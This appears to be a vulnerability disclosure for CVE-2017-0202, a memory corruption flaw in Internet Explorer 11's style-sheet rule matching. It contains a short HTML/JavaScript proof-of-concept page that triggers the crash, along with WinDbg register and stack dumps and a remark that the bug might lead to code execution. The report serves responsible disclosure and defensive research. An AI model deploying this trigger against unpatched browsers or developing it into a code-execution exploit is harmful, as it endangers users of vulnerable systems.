Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption

` Microsoft IE: Memory corruption in CStyleSheetArray::BuildListOfMatchedRules   
  
CVE-2017-0202  
  
  
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.  
  
PoC:  
  
===========================================================  
  
<!-- saved from url=(0014)about:internet -->  
<style>  
#details { transition-duration: 61s; }  
</style>  
<script>  
function go() {  
document.fgColor = "foo";  
m.setAttribute("foo", "bar");  
document.head.innerHTML = "a";  
}  
</script>  
<body onload=go()>  
<details id="details">  
<summary style="transform: scaleY(4)">  
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>  
<style></style>  
  
===========================================================  
  
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.  
  
Debug info:  
  
(d10.1504): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> r  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> k  
# ChildEBP RetAddr   
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77  
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504  
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e  
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25  
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374  
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a  
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d  
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374  
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b  
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34  
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa  
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26  
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28  
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526  
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147  
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a  
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34  
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7  
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b  
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23  
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d  
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24  
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f  
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: ifratric  
  
`